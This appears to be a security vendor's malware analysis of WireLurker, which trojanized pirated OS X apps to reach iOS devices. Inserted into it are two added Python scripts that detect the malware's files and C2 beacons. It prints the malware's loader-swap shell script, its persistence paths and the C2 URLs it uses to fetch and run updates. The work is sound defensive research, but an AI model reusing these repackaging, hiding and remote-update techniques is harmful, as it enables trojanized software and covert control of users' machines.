
PAGE – 2 ============
Executive Summary 3
Background 4
User Reporting for this Threat 4
Investigation of the Third Party App Store 5
WireLurker Workflow and Malware Progression 6
WireLurker Versions 7
Analysis of WireLurker OS X Malware 9
Bundle Repackaging and File Hiding 9
Self Update 11
Persistence Mechanisms 13
C2 Server Communication 14
iOS Application Download 15
USB Connection Monitoring 17
Exfiltration of Device Information 17
Installation of Malicious Dynamic Library to an iOS Device 18
Backup of Specific Installed Applications from an iOS Device 19
Trojanizing iOS Applications 20
Installation of Trojanized iOS Applications 20
Analysis of WireLurker iOS Malware 22
Code Injection into System Applications 22
Self Update 23
Exfiltration of User Data 24
Exfiltration of Application Usage and Device Serial Number Information 25
Overall Threat Analysis 26
Use of Repackaging to Trojanize Applications 26
Malicious Use of USB Connections 26
Attacks Against Jailbroken Devices 26
Attacks Against Non-Jailbroken Devices 26
Actor Motivation 27
Prevention, Detection, Containment and Remediation 27
Prevention 27
Detection and Containment 28
Remediation 29
Acknowledgements 29
Appendix 30
SHA-1 Hashes of WireLurker Related Files 30
URLs for C2 Communication 31
Version C Encrypted C2 Communication Code 32

PAGE – 3 ============
PALO ALTO NETWORKS + WireLurker – Apple OS X and iOS malware

Executive Summary

Palo Alto Networks® recently discovered a new family of Apple OS X and iOS malware, which we have named WireLurker. We believe that this malware family heralds a new era in malware across Apple's desktop and mobile platforms based on the following characteristics:

• Of known malware families distributed through trojanized/repackaged OS X applications, the biggest in scale we have ever seen
• Only the second known malware family that attacks iOS devices through OS X via USB
• First malware to automate generation of malicious iOS applications, through binary file replacement
• First known malware that can infect installed iOS applications similar to a traditional virus
• First in-the-wild malware to install third-party applications on non-jailbroken iOS devices through enterprise provisioning

WireLurker was used to trojanize 467 OS X applications on the Maiyadi App Store, a third-party Mac application store in China. In the past six months, these 467 infected applications were downloaded over 356,104 times and may have impacted hundreds of thousands of users.

WireLurker monitors any iOS device connected via USB to an infected OS X computer and installs downloaded third-party applications or automatically generated malicious applications onto the device, regardless of whether it is jailbroken. This is the reason we call it "wire lurker". Researchers have demonstrated similar methods to attack non-jailbroken devices before; however, this malware combines a number of techniques to successfully realize a new breed of threat to all iOS devices. WireLurker exhibits complex code structure, multiple component versions, file hiding, code obfuscation and customized encryption to thwart anti-reversing.

In this whitepaper, we explain how WireLurker is delivered, the details of its malware progression, and specifics of its operation. We further describe WireLurker's potential impact; methods to prevent, detect, contain and remediate the threat; and the Palo Alto Networks enterprise security platform protections in place to counter the associated risk. WireLurker is capable of stealing a variety of information from the mobile devices it infects and regularly requests updates from the attackers' command and control server. This malware is under active development and its creator's ultimate goal is not yet clear.

PAGE – 4 ============
Background

User Reporting for this Threat

A developer at Tencent initially observed WireLurker on June 1, 2014, when he found highly suspicious files and processes on his Mac and iPhone (Figure 1). Nine days later, a thread was created on a Chinese developer forum by the user "LeoHe", describing anomalous findings on his iPhone. A similar thread was created on a Chinese Apple fan forum on August 9, 2014. In these forum threads, numerous users reported the installation of strange applications and the creation of enterprise provisioning profiles on their non-jailbroken iPhones and iPads (Figure 2). They also mentioned launch daemons found on their Mac computers, with names like "machook_damon" and "WatchProc". Some of these same users stated that they had recently downloaded and installed applications from the Maiyadi App Store (http://app.maiyadi.com), a third-party OS X and iOS application store in China.

As background, the Maiyadi site is a Chinese portal for Apple-related news and resources. The Maiyadi App Store is a sub-site known to host pirated premium Mac, iPhone, and iPad applications.

FIGURE 1 + Report of strange apps appearing on a non-jailbroken iPhone
FIGURE 2 + Additional developer forum discussion regarding anomalous findings

PAGE – 5 ============
Investigation of the Third Party App Store

Some forum users specifically mentioned downloading a Mac application named "CleanApp" (Figure 3) from the Maiyadi App Store and suspected it might be the culprit. In fact, our investigation revealed that almost all of the Mac applications (totaling 467) uploaded to the Maiyadi App Store from April 30, 2014, to June 11, 2014, were trojanized/repackaged with WireLurker. These impacted applications had been downloaded 356,104 times as of October 16, 2014. Table 1 lists the top 10 WireLurker applications, ordered by number of downloads.

FIGURE 3 + One of the applications in the Maiyadi App Store infected with WireLurker

TABLE 1 + Top 10 WireLurker downloads from the Maiyadi App Store (as of Oct 10, 2014)

WIRELURKER INFECTED APPLICATION | NUMBER OF DOWNLOADS
The Sims 3 | 42,110
International Snooker 2012 | 22,353
Pro Evolution Soccer 2014 | 20,800
Bejeweled 3 | 19,016
Angry Birds | 14,009
Spider 3 | 12,745
NBA 2K13 | 11,113
GRID | 10,820
Battlefield: Bad Company 2 | 8,065
Two Worlds II Game of the Year Edition | 6,451

PAGE – 6 ============
All of the WireLurker trojanized applications included an installation interface that used "Pirates of the Caribbean" themed wallpaper (Figure 4). A seal and a QQ account number were also displayed, both of which correspond to the owner of the Maiyadi site. Another similarity between these installers was that their packages always contained an application with a Chinese name ("User Manual", in English). These trojanized applications were hosted on two cloud storage websites, Huawei and Baidu, instead of on Maiyadi's servers.

FIGURE 4 + Installation interface of WireLurker infected applications

WireLurker Workflow and Malware Progression

This section summarizes WireLurker's workflow and malware progression (Figure 5), which are described in further detail in subsequent sections.

FIGURE 5 + WireLurker's workflow and malware progression

PAGE – 8 ============
Examination of the differences between these three versions of code demonstrates progressive refinement:

• Version A neither downloads nor installs iOS applications to connected devices, and communicates with the C2 server in the clear (plaintext).
• Version B downloads and installs iOS applications, but only for jailbroken devices; it also communicates with its C2 server in the clear.
• Version C downloads and installs iOS applications for both jailbroken and non-jailbroken devices, and incorporates a custom encryption protocol for its C2 server communication.

Another significant difference between versions is found in the associated malicious filenames, paths and their content. WireLurker consists of dozens of malicious files that can be grouped into the following categories:

• Original malicious samples which were used to trojanize Mac applications
• Dropped malicious executable files and configuration files
• Downloaded update packages from the C2 server
• Locally generated database and log files
• Downloaded IPA format iOS applications
• Malicious iOS executable files
• Malicious iOS dynamic library files

The filenames and SHA-1 hashes for all associated files can be found in the Appendix of this whitepaper.

FIGURE 6 + WireLurker version information embedded in a URL found in the binary

TABLE 2 + How these categories of files changed between versions

FILES GROUP | VERSION A TO B | VERSION B TO C
Original samples | No changes. | No changes.
Dropped files | Path and content changes. | Path and content changes.
Downloaded updates | Unknown. | Downloaded a shell script with a packed executable file.
Generated files | Path and filename changes. | Path and filename changes.
Downloaded IPAs | Downloaded a game and a third-party app store client. | Downloaded a normal app.
Malicious iOS executables | New feature. | Path changed and content slightly changed.
Malicious iOS dynlibs | No changes. | Path and filename changes.

PAGE – 9 ============
Analysis of WireLurker OS X Malware

Bundle Repackaging and File Hiding

Every OS X application is a bundle that contains an executable as its main entry point. WireLurker trojanizes OS X applications using three files: a loader, a shell script and a ZIP archive. The first step WireLurker takes is to append an underscore to the original bundle executable's name and then copy its malicious loader into the bundle in place of the original executable. As an example, given an OS X bundle with an executable named "Contents/MacOS/CleanApp", WireLurker would move the original file to "Contents/MacOS/CleanApp_" and then copy the malicious loader to "Contents/MacOS/CleanApp". After the executable replacement, WireLurker adds a shell script, "start.sh", and a ZIP archive, "FontMap1.cfg", to the "Contents/Resources" folder of the bundle. The "hidden" flag is then set on these four files. This flag is an Apple-specified file property defined in "/usr/include/sys/stat.h" as "UF_HIDDEN". With this flag set, a standard user won't see the files in the Finder, but can still view them through the Terminal (Figure 7).

FIGURE 7 + WireLurker hidden files within an application bundle

PAGE – 10 ============
These operations trojanize the original application through repackaging. After the bundle is trojanized, the malicious loader is executed when the application is run. The loader first drops an embedded script file to "/Users/Shared/run.sh", with the following content:

    #!/bin/sh
    /bin/cp -rf '%@' '%@2'
    /bin/cp -rf '%@_' '%@' && /usr/bin/open -a '%@'
    sleep 5
    /bin/cp -rf '%@2' '%@'
    rm -rf '%@2'

The text "%@" is replaced by the full path to the application's bundle executable before the script is dropped. This effectively backs up the loader, restores the original bundle executable, runs it, restores the loader, and deletes the script itself. It also sets the "hidden" flag again on the loader and the original bundle executable.

After dropping the above script, the loader determines whether this is the first time it has been run by looking for the "/usr/local/machook/machook" file. If that file doesn't exist, it performs the following actions:

• Copies the "/Resources/start.sh" and "/Resources/FontMap1.cfg" files to the "/Users/Shared/" folder on the Mac
• Requests system administrator privileges
• Executes "/Users/Shared/start.sh" with administrator privileges

The "start.sh" script:

• Decompresses the "FontMap1.cfg" ZIP archive to a new folder, "/usr/local/machook/"
• Copies the decompressed "com.apple.machook_damon.plist" and "com.apple.globalupdate.plist" files to the "/Library/LaunchDaemons/" folder to register them as system launch daemons
• Launches these two daemons using the launchctl command
• Copies a decompressed "globalupdate" file to the "/usr/bin/" folder

Then, the loader collects the hardware serial number of the Mac and uploads it to the C2 server, www[.]comeinbaby.com (Figure 8).

FIGURE 8 + WireLurker uploading the hardware serial number for an OS X victim machine
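As an added example (not code from the whitepaper or from Palo Alto Networks), the following Python script hunts for the bundle repackaging artifacts described under Bundle Repackaging and File Hiding and for the dropped files and launch daemons listed above; every path it checks is one named on this page, and the sample bundle that build_sample creates is constructed test data.

```python
# Added example, not from the WireLurker whitepaper: hunt for the artifacts described above.
import os
import stat
import tempfile
from pathlib import Path

# Dropped-file and persistence paths named in the report, relative to "/".
HOST_ARTIFACTS = (
    "usr/local/machook/machook",
    "usr/bin/globalupdate",
    "Library/LaunchDaemons/com.apple.machook_damon.plist",
    "Library/LaunchDaemons/com.apple.globalupdate.plist",
    "Users/Shared/run.sh",
    "Users/Shared/start.sh",
    "Users/Shared/FontMap1.cfg",
)

def is_hidden(path):
    # UF_HIDDEN is a BSD st_flags bit; Linux has no st_flags, so False there.
    return bool(getattr(os.stat(path), "st_flags", 0) & stat.UF_HIDDEN)

def scan_bundle(bundle):
    """Return (indicator, path) pairs found in one .app bundle."""
    macos = Path(bundle) / "Contents" / "MacOS"
    resources = Path(bundle) / "Contents" / "Resources"
    findings = []
    # Original executable renamed "<name>_", loader installed as "<name>".
    for exe in (macos.iterdir() if macos.is_dir() else []):
        if exe.name.endswith("_") and (macos / exe.name[:-1]).is_file():
            findings.append(("renamed original executable", str(exe)))
    for name in ("start.sh", "FontMap1.cfg"):
        if (resources / name).is_file():
            findings.append(("dropped resource", str(resources / name)))
    findings += [("UF_HIDDEN set", p) for _, p in findings if is_hidden(p)]
    return findings

def scan_host(root="/"):
    """Return the report's dropped-file paths that exist under root."""
    return [str(Path(root) / r) for r in HOST_ARTIFACTS if (Path(root) / r).exists()]

def build_sample(root=None):
    """Constructed sample data: one repackaged bundle plus one dropped plist."""
    root = Path(root or tempfile.mkdtemp())
    app = root / "Applications" / "CleanApp.app"
    files = [app / f for f in ("Contents/MacOS/CleanApp", "Contents/MacOS/CleanApp_",
             "Contents/Resources/start.sh", "Contents/Resources/FontMap1.cfg")]
    for p in files + [root / HOST_ARTIFACTS[2]]:
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("placeholder\n")
    return app
```

On a Mac under examination, call scan_bundle on each .app under /Applications and scan_host with its default root; the UF_HIDDEN findings only appear there, since Linux has no BSD file flags.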

PAGE – 11 ============
Self Update

In WireLurker version A, the dropped "globalupdate" file is executed as a launch daemon and periodically checks its C2 server for a new version, using the following GET request:

    http://www[.]comeinbaby.com/mac/getversion.php?sn=

A packet capture of this communication is shown in Figure 9. A sample C2 server response follows:

When the "version" field returns a non-zero value, WireLurker downloads the ZIP archive specified in the "url" field, decompresses that archive to "/usr/local/machook/update/", and executes the enclosed "start.sh" script.

WireLurker version B uses a different C2 server request to check for updates:

    http://www[.]comeinbaby.com/mac/getsoft.php

In this version, the HTTP response body contains the plaintext of the "start.sh" script to execute, and the temporary folder from which it runs is set to "/tmp/up".

When we began analysis of WireLurker, its update package contained version C. The "start.sh" script for this version executed a newly added "update" binary, which:

• Drops numerous new binary executable and .plist files onto the system
• Loads the newly dropped .plist files as launch daemons (e.g., com.apple.MailServiceAgentHelper.plist)
• Deletes the executable and .plist files of previous versions
• Unloads the old launch daemons

FIGURE 9 + Packet capture of WireLurker version update communication with the C2 server
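The update checks above give a network detection opportunity. As an added example (not code from the whitepaper or from Palo Alto Networks), this Python snippet classifies proxy log lines by the two update-check paths and flags any other contact with the C2 host; the log format and the serial number in the sample lines are constructed.

```python
# Added example, not code from the WireLurker whitepaper: flag the version A
# and B update checks (and any other contact with the C2 host) in proxy logs.
import re
from urllib.parse import parse_qs, urlsplit

C2_HOST = "www.comeinbaby.com"  # defanged in the report as www[.]comeinbaby.com
# Update-check paths from the report, mapped to the WireLurker version using them.
UPDATE_PATHS = {"/mac/getversion.php": "A", "/mac/getsoft.php": "B"}

# Constructed sample lines in a "<client> <method> <url>" shape; the serial is made up.
SAMPLE_LOG = """\
10.0.0.5 GET http://www.comeinbaby.com/mac/getversion.php?sn=C02XXXXXXXXX
10.0.0.7 GET http://example.com/index.html
10.0.0.9 GET http://www.comeinbaby.com/mac/getsoft.php
10.0.0.5 POST http://www.comeinbaby.com/mac/other.php
"""
LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+)$")

def classify(url):
    """Return a finding dict for a WireLurker C2 URL, else None."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() != C2_HOST:
        return None
    serial = parse_qs(parts.query).get("sn", [None])[0]  # victim Mac serial, if sent
    return {"version": UPDATE_PATHS.get(parts.path, "unknown path"),
            "path": parts.path, "serial": serial}

def find_beacons(log_text):
    """Walk proxy log lines and collect WireLurker C2 hits per client."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        finding = classify(m["url"])
        if finding:
            hits.append({"client": m["client"], **finding})
    return hits

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```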
